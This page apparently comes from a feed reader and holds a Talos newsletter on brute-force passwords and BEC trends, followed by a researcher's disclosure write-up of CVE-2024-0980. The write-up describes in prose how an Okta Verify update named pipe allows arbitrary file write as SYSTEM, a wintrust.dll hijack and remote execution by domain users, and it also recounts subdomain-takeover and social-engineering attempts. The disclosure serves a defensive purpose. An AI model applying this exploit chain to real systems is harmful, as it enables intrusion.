Normal view

There are new articles available, click to refresh the page.
Today — 2 May 2024Main stream

What can we learn from the passwords used in brute-force attacks?

2 May 2024 at 18:00
What can we learn from the passwords used in brute-force attacks?

Brute force attacks are one of the most elementary cyber threats out there. Technically, anyone with a keyboard and some free time could launch one of them — just try a bunch of different username and password combinations on the website of your choice until you get blocked.  

Nick Biasini and I discussed some of the ways that organizations can defend against brute force attacks since detection usually doesn’t fall into the usual bucket (ex., there’s nothing an anti-virus program could detect running). But a good place to start just seems to be implementing strong password rules, because people, unsurprisingly, are still using some of the most obvious passwords that anyone, attacker or not, would guess. 

Along with our advisory on a recent increase in brute force attacks targeting SSH and VPN services Cisco Talos published a list of IP addresses associated with this activity, along with a list of usernames and passwords adversaries typically try to use to gain access to a network or service. 

There are some classics on this list — the ever-present “Password” password, Passw0rd (with a zero, not an “O”) and “123456.” This tells me that users still haven’t learned their lesson. It’s somewhat funny to think about some well-funded actor just being like, “Well, let me try to ‘hack’ into this machine by using ‘123456’” as if they’re in a parody movie, but if they already can guess a username based off someone’s real name, it’s not that unlikely that password is being used somewhere. 

A few other example passwords stood out to me: “Mart1x21,” because I can’t tell if this is just someone named “Martin” or a play on the month of March, and things like “Spring2024x21” and “April2024x21” because I appreciate the idea that someone using that weak of a password thinks that adding the extra three characters onto “April2024” is really going to throw an attacker off. 

Looking at this list got me thinking about what some potential solutions are to the internet’s password problem, and our ever-present battle to educate users and warn them about the dangers of using weak or default passwords. 

Going passwordless is certainly one option because if there just are no passwords to log in, there’s nothing text-based an attacker could just start guessing. 

The best solution I’ve seen recently is that the U.K. literally made a law requiring hardware and software manufacturers to implement stronger security standards. The Product Security and Telecommunications Infrastructure (PSTI) that went into effect last month contains a range of security protections companies must follow, but they now include mandatory password rules that will force users to change default passwords when registering for new accounts and stop them from using easy-to-guess passwords like “Admin” and “12345.”  

It would be great if users would just stop using these credentials on their own, but if attackers are still thinking that someone out there is using “Password” as their password, they probably are.  

The one big thing 

For the first time in several quarters, business email compromise (BEC) was the most common threat in Cisco Talos Incident Response (Talos IR) engagements during the first quarter of 2024. BEC made up 46 percent of all engagements in Q1, a significant spike from Q4 2023, according to the latest Talos IR Quarterly Trends Report. Ransomware, which was the top-observed threat in the last quarter of 2023, decreased by 11 percent. Talos IR also observed a variety of threats in engagements, including data theft extortion, brute-force activity targeting VPNs, and the previously seen commodity loader Gootloader. 

Why do I care? 

BEC is a tactic adversaries use to disguise themselves as legitimate members of a business and send phishing emails to other employees or third parties, often pointing to a malicious payload or engineering a scheme to steal money. The use of email-hiding inbox rules was the top-observed defense evasion technique, accounting for 21 percent of engagements this quarter, which was likely due to an increase in BEC and phishing within engagements. These are all valuable insights from the field provided in Talos IR’s full report. 

So now what? 

There are some known indicators of compromise that customers can look for if they suspect The lack of MFA remains one of the biggest impediments for enterprise security. All organizations should implement some form of MFA, such as Cisco Duo. The implementation of MFA and a single sign-on system can ensure only trusted parties are accessing corporate email accounts, to prevent the spread of BEC. If you’d like to read about other lessons from recent Talos IR engagements, read the one-pager here or the blog post here

Top security headlines of the week 

The chief executive of UnitedHealth Group testified to U.S. Congress on Wednesday regarding the recent cyber attack against Change Healthcare. Change’s operations went nearly completely dark for weeks earlier this year after a data breach, which likely resulted in millions of patients’ records and personal information being accessed. Lawmakers questioned whether UnitedHealth was too involved in the nation’s medical systems, as Change manages a third of all American patient records and processes more than 15 billion transactions a year at doctor’s offices, hospitals and other medical providers. As a result of the outage, some healthcare practitioners went more than a month without being paid, and many had to tap into their personal funds to keep offices open. UnitedHealth’s CEO told Congress the company was still working to figure out the full extent of the campaign and was talking to U.S. agencies about how to best notify individuals who were affected. The hearing has also generated a conversation around consolidation in the American healthcare industry and whether some groups are controlling too much of the patient base. (The New York Times, CNBC

Vulnerabilities in a popular phone tracking app could allow anyone to view all users’ locations. A security researcher recently found that iSharing, which allows users to see the exact location of a device, contains a vulnerability that prevented the app's servers from conducting proper checks of user data access. iSharing is advertised as an app for users who want to track friends' and family members’ locations or as an extra layer of security if their device were to be lost or stolen. The flaws also exposed users’ names, profile pictures, email addresses and phone numbers. The researcher who discovered the vulnerability was able to show a proof-of-concept exploitation almost immediately after creating a brand new account on the app. Representatives from the developers of iSharing told TechCrunch that the company’s logs did not show any signs of the vulnerability being exploited prior to the researcher’s disclosure. These types of apps can also be used as “stalkerware,” in which someone who knows a targeted user quietly downloads the app on a target’s phone, and then uses it to remotely track their location. (TechCrunch

Adversaries are hiding malware in GitHub comments, disguising malicious code as URLs associated with Microsoft repositories, and making the files appear trustworthy. Although some security researchers view this as a vulnerability, Microsoft maintains that it is merely a feature of using GitHub. While adversaries have so far mainly abused this feature to mirror Microsoft URLs, it could theoretically be used to create convincing lures on any GitHub repository. When a user leaves a comment in GitHub, they can attach a file, which is then uploaded to GitHub’s CDN and associated with the related project using a unique URL. GitHub automatically generates the link to download that attachment after adding the file to an unsaved comment, allowing threat actors to attach malware to any repository without the administrators knowing. This method has already been abused to distribute the Readline information-stealing trojan by attaching comments to Microsoft’s GitHub-hosted repositories for “vcpkg” and “STL.” The malicious URL will even still work if the poster deletes the comment, allowing them to reuse the GitHub-generated URL. (Bleeping Computer, Dark Reading

Can’t get enough Talos? 

 

Upcoming events where you can find Talos

RSA (May 6 - 9) 

San Francisco, California    

ISC2 SECURE Europe (May 29) 

Amsterdam, Netherlands 

Gergana Karadzhova-Dangela from Cisco Talos Incident Response will participate in a panel on “Using ECSF to Reduce the Cybersecurity Workforce and Skills Gap in the EU.” Karadzhova-Dangela participated in the creation of the EU cybersecurity framework, and will discuss how Cisco has used it for several of its internal initiatives as a way to recruit and hire new talent.  

Cisco Live (June 2 - 6) 

Las Vegas, Nevada  

Most prevalent malware files from Talos telemetry over the past week 

This section will be on a brief hiatus while we work through some technical difficulties. 

Okta Verify for Windows Remote Code Execution – CVE-2024-0980

By: b0yd
2 May 2024 at 17:41

This article is in no way affiliated, sponsored, or endorsed with/by Okta, Inc. All graphics are being displayed under fair use for the purposes of this article.

Poppin shells with Okta Verify on Windows

These days I rarely have an opportunity to do bug hunting. Fortunately, over the holiday break, I found some free time. This started as it usually does with me looking at what software was running on my computer.

A while back I had installed Okta Verify on my Windows box as it was required for some “enhanced” 2FA that I was required to have to access a thing. Months later it sat there doing whatever it does. I googled to see if Okta had a bug bounty program because even though I had some time, it’d be nice to get paid if I found a thing. I was thrilled to find that Okta had a bug bounty with Bugcrowd, Okta Verify is in it, and the payouts look good, almost too good.

I started with my usual bug hunting flow when approaching a random Windows service. This typically includes looking for the usual low hanging fruit. A good article for the types of things to look for can be found here.

Firing up Sysinternal’s Procmon, I saw there is a service called Okta.Coordinator.Service that is running as SYSTEM. Without going into the details (namely because Okta hasn’t fixed it or issued it a CVE), I found a thing. I submitted the report and was promptly paid.

Well that’s weird. The bug I submitted is an unequivocal 7.8 CVSS. Which without knowing the voodoo behind P ratings (P1-P4), seems like would be a P2 at least. Instead I get a P3 and paid out at the lower end.

Looking back on it, I’m betting this is probably an old bug bounty program trick to motivate researchers to dig deeper… because, it worked. I decided to take a closer look since I hadn’t even opened up the binary to see what it was doing – and I wanted to get that big payout.

Let’s Get Crackin’

I haven’t popped Okta.Coordinator.Service.exe into a disassembler yet, but I’m betting it’s a .NET application. My guess comes from its name and the fact that there’s an Okta.Coordinator.Service.exe.config file right there with it, which you usually see with .NET applications.

When I open up the executable in JetBrains dotPeek, I can confirm it is indeed a .NET application. The binary appears to be a service wrapper. It handles the service related functionality: install, uninstall, start, stop, etc.  It references a Okta.AutoUpdate.Executor class that just so happens to have a matching DLL in the same directory.

Moving on to the DLL in dotPeek, I found the code used by the service. The first thing I noticed was it sets up a NamedPipe server, which listens for commands to update the Okta Verify software. This is a common design paradigm in Windows for enabling low-privileged applications to communicate with a high-privileged service to perform updates, as these often require elevated privileges. It’s a complex mechanism that’s tricky to do right, and often a good place for finding bugs. I was able to confirm the existence of the named-pipe server with a little Powershell.

Next, I investigated how to initiate an update and what aspects of this process could be manipulated by an attacker. The handler for the named pipe processes a straightforward JSON message that includes several fields, some checked against expected values. The primary field of interest is the update URL. If the input data passes validation, the software will attempt to fetch details from the specified URL about the most recent update package available. As shown below, the URL (sub)domain is verified against a whitelist before proceeding. For now, I’ll avoid trying to meet/bypass this requirement and simply add an entry in the hosts file on my test machine.

Typically at this stage, I’d code up a proof of concept (POC) to send a JSON message to the named pipe and check if the software connected to a web server I control. But since I haven’t spotted any potential vulnerabilities yet, I skipped that step and moved on.

From here I took a look at the code responsible for processing the JSON message retrieved from the attacker controlled update server. The application is expecting a message that contains metadata about an update package including versioning and an array of file metadata objects. These objects contain several pertinent fields such the download URL, size, hash, type, and command line arguments. The provided download URL is validated with the same domain checking algorithm as before. If the check passes, the software downloads the file and writes it to disk. This is where things get interesting. The code parses the download URL from the received metadata and constructs the file path by calling the Path.Combine function.

Several factors are converging here to create a serious vulnerability. The most obvious is the use of the Path.Combine function with user supplied data. I went into depth about this issue in a previous blog post here. The TLDR is if a full path is provided as the second argument to this function, the first argument that typically specifies the parent folder, is ignored. The next issue is how the filename is parsed. The code splits the file location URL by forward slash and takes the last element as the filename. The problem (solution) is a full Windows path can be inserted here using back slashes and it’s still a valid URL. Since the service is running as SYSTEM, we have permissions to right anywhere. If we put all this together our payload looks something like the script below.

Copy to Clipboard

Now that I have a potential bug to test out, I craft the POC for the named pipe client to trigger the update. Luckily, this code already exists in the .NET DLL for me to repurpose.  With my web server code also in place I send the request to test out the file write. As I had hoped, the file write succeeds!

Cool, but what about impact!

I have the ability to write arbitrary files as SYSTEM on Windows. How can I leverage this to achieve on-demand remote code execution? The first thing that comes to mind is some form of DLL hijacking. I’ve used phantom DLL hijacking in the past but this is more appropriate for red team operations where time constraints aren’t really an issue. What I really need is the ability to force execution shortly after the file write.

Since the whole purpose behind this service is to install an update, can I just use it to execute my code? I reviewed the code after the file write to see what it takes to execute the downloaded update package. It appears the file type field in the file object metadata is used to indicate which file to execute. If the EXE or MSI file type is set, the application will attempt to validate the file signature before executing it, along with any supplied arguments. The process launcher executes the binary with UseShellExecute set to false so no possibility of command injection.

My original thought was to deliver a legitimate Okta Verify package since this would pass the signature check. I could then use ProcMon to identify a DLL hijack in the install package. Privileged DLL hijacks occur in almost all services because the assumption is you already require the permissions to write to a privileged location. Ironically though, I found the service binary actually contained a DLL hijack just prior to the signature verification to load the necessary cryptographic libraries. If I write a DLL to C:\Program Files (x86)\Okta\UpdateService\wintrust.dll, it will get loaded just prior to signature verification.

Great, so now I have a way to execute arbitrary code from an unprivileged user to SYSTEM. “Guessing” that this probably won’t meet the bar of P1 or P2, I start thinking of how to upgrade this to remote code execution. If RCE doesn’t get a P1 then what does? The interesting thing about named pipes is that they are often remotely accessible. It all depends on what permissions are set. Looking at the code below, it sets full control to the “BUILTIN\Users” group.

Testing from a remote system in my network confirms that I get permissioned denied when I try to connect to the named pipe. After a couple of days I had an idea. If a Windows system is part of a Active Directory domain, does the BUILTIN/Users group permissions automatically get converted to the “Domain Users” group in a domain? This would mean any user in an AD domain could remotely execute code on any system that has Okta Verify installed. Moreover, considering that this software is aimed at large corporate enterprises, it would likely be included in the standard build and deployed broadly. So not explicitly “Domain Admin” but a good chance of it. I had to find out, so I stood up a test AD network in AWS and the following video shows what happened.

Almost done

Well that seems like a big deal right? Maybe get a P1 (and 70k…)? I’m guessing the small detail about not having an Okta subdomain to download from may keep it from landing a P1. Having worked at big tech companies, I know that subdomain takeover reports are common. However, without having a subdomain takeover, it’s likely the bug’s significance will be minimized. I decided to dedicate some time to searching for one to complete the exploit chain. After going through the standard bug bounty subdomain takeover tools, I came up with only one viable candidate: oktahelpspot.okta.com.  It pointed to an IP with no open ports, managed by a small VPS provider named Arcustech.

After signing up for an account and some very innocent social engineering, I got the following response. And then a second email from the first person’s manager. Oh well, so much for that.

The next thing that came to mind was leveraging a custom Okta client subdomain. Whenever a new client registers with Okta, they receive a personalized Okta subdomain to manage their identity providers, e.g. trial-XXXXXXX.customdomains.okta.com. I found a way to set custom routes in the web management application that would redirect traffic from your custom domain to a user defined URL. Unfortunately, this redirect was implemented in Javascript, rather than through a conventional 302 or 301 HTTP redirect. Consequently, the .NET HTTP client that the Okta Verify update service uses did not execute the Javascript and therefore did not follow the redirect as a browser would.

Reporting

At this point, I decided it was time to report my findings to Okta. Namely, because they were offering a bonus at the time for what appeared to be Okta Verify, which I think they might have either forgotten or included without mentioning. Secondly, I didn’t want to risk someone else beating me to it. I am happy to report they accepted the report and awarded me a generous bounty of $13,337 as a P2. It wasn’t quite $70k, or a P1, but it’s nothing to sneeze at. I want to thank Okta for the bounty and quick resolution. They also kindly gave me permission to write this blog post and followed through with issuing CVE-2024-0980 along with an advisory.

One last note, if anyone reading this identifies a way to bypass the subdomain validation check I would be very interested. I attempted most of the common URL parsing confusion techniques as well as various encoding tricks all for naught. Drop me a line at @rwincey on X

❌
❌